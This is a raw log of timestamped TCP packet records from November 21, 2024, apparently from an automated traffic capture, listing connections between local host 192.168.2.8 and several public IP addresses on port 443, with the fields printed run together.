                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.428431034 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.429662943 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.429743052 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.431885958 CET44349788162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.431983948 CET49788443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.460287094 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.460473061 CET44349778162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464565039 CET4434977449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464637041 CET49774443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.464714050 CET49784443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.468101025 CET49778443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949433088 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949533939 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.949616909 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.954737902 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.955120087 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.955127001 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.956801891 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.956871986 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.957825899 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.957910061 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968061924 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968261003 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.968270063 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.971930027 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.971991062 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972281933 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972393990 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.972486973 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990053892 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990106106 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990139961 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990158081 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990179062 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990195990 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.990993023 CET49763443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991019011 CET4434976349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991787910 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991822004 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.991893053 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.992146969 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.992157936 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011785984 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011811018 CET44349798162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.011881113 CET49798443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.118932962 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.118936062 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.119004965 CET4434979318.165.220.106192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.223403931 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.223980904 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.224003077 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225169897 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225176096 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225195885 CET49795443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.225203991 CET4434979540.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244312048 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244391918 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.244843006 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.245193958 CET49797443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.245210886 CET44349797162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310053110 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310108900 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310179949 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310235977 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310270071 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310357094 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310411930 CET49801443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310429096 CET44349801162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310626984 CET49802443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.310640097 CET44349802162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317433119 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317490101 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317580938 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317787886 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.317814112 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.321882963 CET49793443192.168.2.818.165.220.106
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409728050 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409774065 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409857988 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410054922 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410089970 CET44349805172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410267115 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410823107 CET49804443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.410834074 CET44349804172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.411041975 CET49805443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.318999052 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377536058 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377561092 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377578020 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377610922 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377645969 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377655029 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.377701998 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435761929 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435790062 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435858011 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435869932 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435895920 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.435908079 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.564307928 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.564860106 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.564882994 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.565625906 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.565632105 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.565692902 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.565706968 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.589075089 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.589437008 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.589467049 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.590956926 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.591021061 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.591394901 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.591480017 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.594197035 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.594400883 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.594409943 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.595473051 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.595632076 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.595824003 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.595885992 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598645926 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598668098 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598714113 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598725080 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598752022 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.598767042 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.635909081 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.635915995 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.635924101 CET44349808172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.635926962 CET44349809172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.636914015 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.636936903 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.636992931 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.637022018 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.637250900 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662142992 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662188053 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662223101 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662260056 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662277937 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.662467003 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.676531076 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.676594973 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.676656961 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.676889896 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.676904917 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.682115078 CET49808443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.682423115 CET49809443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687284946 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687310934 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687378883 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687413931 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687431097 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.687449932 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.812732935 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.812757015 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.812825918 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.812850952 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.812988043 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.226454973 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.226476908 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.226522923 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.226531029 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.226587057 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.234107018 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.234129906 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.234208107 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.234217882 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.234791994 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240397930 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240422010 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240480900 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240489960 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240528107 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.240547895 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.247736931 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.247761011 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.247828007 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.247836113 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.247890949 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.255045891 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.255064011 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.255143881 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.255150080 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.255201101 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262320995 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262339115 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262392044 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262398005 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262428999 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.262449980 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.269881964 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.269900084 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.269941092 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.269946098 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.269984007 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324717045 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324762106 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324810982 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324848890 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324863911 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324878931 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324882984 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.324949026 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.325236082 CET49803443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.325246096 CET4434980340.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440077066 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440098047 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440146923 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440159082 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440188885 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.440215111 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.447405100 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.447421074 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.447494030 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.447499990 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.447633982 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454001904 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454018116 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454073906 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454081059 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454114914 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.454148054 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.461528063 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.461544991 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.461592913 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.461599112 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.461639881 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.468969107 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.468986034 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.469027996 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.469033003 CET4434980049.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.469068050 CET49800443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925070047 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925101995 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925177097 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925213099 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925259113 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925339937 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.925599098 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.940104008 CET49811443192.168.2.823.44.203.23
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.940152884 CET4434981123.44.203.23192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.946616888 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.957434893 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.957462072 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.957915068 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.958004951 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.958636045 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.958682060 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.959687948 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.959803104 CET4434981320.25.227.174192.168.2.8
